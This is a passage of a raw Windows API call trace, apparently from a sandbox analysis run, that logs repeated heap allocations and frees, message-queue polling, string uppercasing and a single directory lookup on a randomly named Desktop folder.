RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0166.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0166.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0166.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a96d8 [0166.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0166.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0166.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0166.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0166.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0166.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0166.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0166.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0166.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0166.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0166.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0166.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0166.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0166.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0166.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0166.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0166.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0166.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0166.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0166.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0166.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0166.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0166.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0166.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0166.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0166.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0166.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0166.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0166.154] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0166.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0166.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0166.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0166.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0166.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0166.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0166.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0166.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0166.154] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0166.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0166.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0166.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0166.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0166.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0166.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0166.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0166.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0166.155] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0166.155] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0166.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0166.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0166.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0166.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0166.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0166.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0166.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0166.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0166.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0166.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0166.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0166.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0166.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0166.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0166.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0166.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0166.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0166.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0166.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0166.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0166.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0166.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0166.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0166.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0166.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0166.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0166.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0166.157] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0166.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0166.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0166.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0166.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0166.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0166.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0166.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0166.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0166.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0166.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0166.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0166.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0166.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0166.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0166.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0166.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0166.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0166.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0166.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0166.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0166.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0166.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0166.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0166.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0166.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0166.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0166.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0166.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0166.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0166.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0166.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0166.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0166.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0166.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0166.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0166.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0166.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0166.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0166.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0166.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0166.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0166.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0166.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0166.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0166.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0166.159] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0166.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0166.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0166.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0166.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0166.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0166.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0166.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0166.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0166.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0166.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0166.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0166.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0166.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0166.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0166.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0166.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0166.160] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0166.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0166.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0166.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0166.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0166.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0166.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0166.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0166.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0166.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0166.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0166.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0166.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0166.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0166.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0166.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0166.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0166.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0166.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0166.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0166.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0166.161] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/KU9xovkL1lisorTK5X", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8baf2140, ftCreationTime.dwHighDateTime=0x1d4d21a, ftLastAccessTime.dwLowDateTime=0xbf7b9390, ftLastAccessTime.dwHighDateTime=0x1d4cda2, ftLastWriteTime.dwLowDateTime=0xbf7b9390, ftLastWriteTime.dwHighDateTime=0x1d4cda2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8900006, dwReserved1=0xea78, cFileName="KU9xovkL1lisorTK5X", cAlternateFileName="KU9XOV~1")) returned 0xaa55e0 [0166.161] FindClose (in: hFindFile=0xaa55e0 | out: hFindFile=0xaa55e0) returned 1 [0166.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0166.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0166.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0166.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0166.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0166.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0166.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0166.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0166.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0166.161] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0166.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0166.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0166.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0166.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0166.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0166.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0166.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0166.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0166.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0166.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0166.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0166.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0166.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0166.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0166.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0166.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0166.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0166.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0166.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0166.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0166.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0166.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0166.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0166.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0166.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0166.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0166.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0166.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0166.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0166.163] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0166.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0166.163] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0166.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0166.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0166.163] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0166.163] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0166.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0166.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0166.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0166.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0166.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0166.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0166.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0166.164] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0166.164] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.164] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0166.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0166.164] HeapFree (in: hHeap=0x25c0000, 